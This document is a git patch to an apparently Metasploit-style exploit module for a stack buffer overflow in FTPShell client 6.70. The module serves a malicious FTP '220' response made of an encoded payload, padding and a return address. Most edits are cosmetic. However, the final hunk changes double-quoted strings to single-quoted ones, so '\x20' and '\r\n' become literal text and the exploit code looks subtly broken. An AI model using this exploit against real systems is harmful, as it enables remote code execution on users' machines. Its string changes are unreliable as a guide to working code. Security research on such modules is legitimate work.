From bd2fb56adf2a392c45f0e020ebebe22bcd174706 Mon Sep 17 00:00:00 2001
From: Daniel Teixeira <DanielRTeixeira@users.noreply.github.com>
Date: Thu, 28 Jun 2018 12:55:48 +0100
Subject: [PATCH] Update ftpshell_cli_bof.rb

---
 .../exploits/windows/ftp/ftpshell_cli_bof.rb  | 21 ++++++++-----------
 1 file changed, 9 insertions(+), 12 deletions(-)

diff --git a/modules/exploits/windows/ftp/ftpshell_cli_bof.rb b/modules/exploits/windows/ftp/ftpshell_cli_bof.rb
index 3879d1a5da..9371946c3d 100644
--- a/modules/exploits/windows/ftp/ftpshell_cli_bof.rb
+++ b/modules/exploits/windows/ftp/ftpshell_cli_bof.rb
@@ -14,13 +14,13 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow',
       'Description'    => %q{
-          This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise edition) allowing remote
-          code execution.
+          This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise
+          edition) allowing remote code execution.
         },
       'Author'   =>
         [
-          'r4wd3r',                                            # Original exploit author
-          'Daniel Teixeira <danieljcrteixeira[at]gmail.com>'   # MSF module author
+          'r4wd3r',           # Original exploit author
+          'Daniel Teixeira'   # MSF module author
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
@@ -45,13 +45,10 @@ class MetasploitModule < Msf::Exploit::Remote
           'SRVHOST' => '0.0.0.0',
           'EXITFUNC' => 'thread'
         },
-      'DisclosureDate' => 'May 15 2017',
+      'DisclosureDate' => 'March 4 2017',
       'DefaultTarget'  => 0))
 
-    register_options(
-      [
-        OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ])
-      ])
+    register_options [ OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ]) ]
   end
 
   def exploit
@@ -94,11 +91,11 @@ class MetasploitModule < Msf::Exploit::Remote
     res = client.get_once.to_s.strip
     print_status("#{client.peerhost} - Request: #{res}")
 
-    sploit = "220 \""
+    sploit = '220 "'
     sploit << payload.encoded
-    sploit << "\x20"*(400-payload.encoded.length)
+    sploit << '\x20' * (payload_space - payload.encoded.length)
     sploit << target.ret
-    sploit << "\" is current directory\r\n"
+    sploit << '" is current directory\r\n'
 
     print_status("#{client.peerhost} - Request: Sending the malicious response")
     client.put(sploit)